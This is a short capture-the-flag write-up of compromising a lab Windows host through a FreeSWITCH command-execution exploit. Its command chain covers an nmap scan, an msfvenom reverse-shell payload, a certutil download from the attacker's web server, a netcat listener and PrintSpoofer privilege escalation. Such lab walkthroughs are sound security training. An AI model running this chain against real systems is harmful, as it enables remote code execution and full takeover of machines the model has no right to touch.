How low are your morals?
nmap -sV -sC -p- -T5 10.10.135.236 -Pn
There is a service running on port 8021. It’s freeswitch.
Vulnerability research – freeswitch :
The 47799.txt file contains an exploit written in python. You have to rename it to .py
mv 47799.txt 47799.py
Does the exploit work? Is the service vulnerable. We don’t get a lot of information about the service itself. The only way to find out is to test…
python3.9 47799.py 10.10.135.236 whoami
The exploit works. We were able to get the name of the user running the service.
It now takes the exploit to get a reverse shell.
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe
Setting up a Kali web server :
python3.9 -m http.server 8787
python3.9 47799.py 10.10.135.236 ‘certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe‘
Setting up a netcat listener :
nc -nlvp 4444
python3.9 47799.py 10.10.135.236 ‘sr.exe’
Receiving the reverse shell :
User has SeImpersonatePrivilege rights.
PrintSpoofer.exe -i -c cmd
Please note that the command may not work the first time. Do not hesitate to restart it several times.
That’s all folks
Thank you for taking the trouble to come to the site to read this Write-Up
I hope he liked you more and that he taught you new things.
Feel free to leave a comment or share this article.